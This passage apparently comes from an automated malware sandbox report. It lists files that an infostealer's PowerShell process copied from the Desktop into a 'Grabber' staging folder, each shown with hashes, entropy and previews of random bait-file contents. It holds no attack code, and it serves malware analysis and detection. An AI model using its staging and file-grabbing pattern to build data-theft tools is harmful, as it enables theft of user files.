                                                                                      Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-42-624.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 16-15-55-956.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696428505298658900_7B05BF2A-C74F-44F8-B674-AA3F9719008B.log.....App1696428527628431800_6CD9E3BB-4D03-46BD-8615-75A902267162.log.....App1696428537364279100_A2018481-B961-46B4-9328-34939DEAF293.log.....App1696428537364768600_A2018481-B961-46B4-9328-34939DEAF293.log...edge_BITS_6440_1090636871\....4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5...edge_BITS_6440_1191663050\....9e51170b-7adf-40ab-83b6-5f97b13bedcb...edge_BITS_6440_1234978473\....1187695d-8276-4e31-8de1-9e57768989bd...edge_BITS_6440_1289371347\....78549187-a875-4f1e-8dfa-9938ebc29c81...edge_BITS_6440_1318414972\....873489b1-33b2-480a-baa2-641b9e09edcd...ed

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Directories\Videos.txt

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):23
                                                                                      Entropy (8bit):3.7950885863977324
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:k+JrLKB:k+JrLKB
                                                                                      MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                                      SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                                      SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                                      SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Videos\...desktop.ini..

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\BJZFPPWAPT.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\GLTYDMDUST.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69569301223482
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
                                                                                      MD5:CA404BEA65D84F58838AF73B2DC67E02
                                                                                      SHA1:56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
                                                                                      SHA-256:4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
                                                                                      SHA-512:10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\KLIZUSIQEN.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696703751818505
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
                                                                                      MD5:19255ED5D4F37A096C105CEF82D0F5C0
                                                                                      SHA1:96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
                                                                                      SHA-256:A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
                                                                                      SHA-512:CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\NYMMPCEIMA.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6957997909429325
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
                                                                                      MD5:4F49714E789620AEDB7B9565DC949466
                                                                                      SHA1:5917AC09E3D5074BFF8E1289865CAFF6403D1E82
                                                                                      SHA-256:A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
                                                                                      SHA-512:61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\BJZFPPWAPT\ZGGKNSUKOP.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
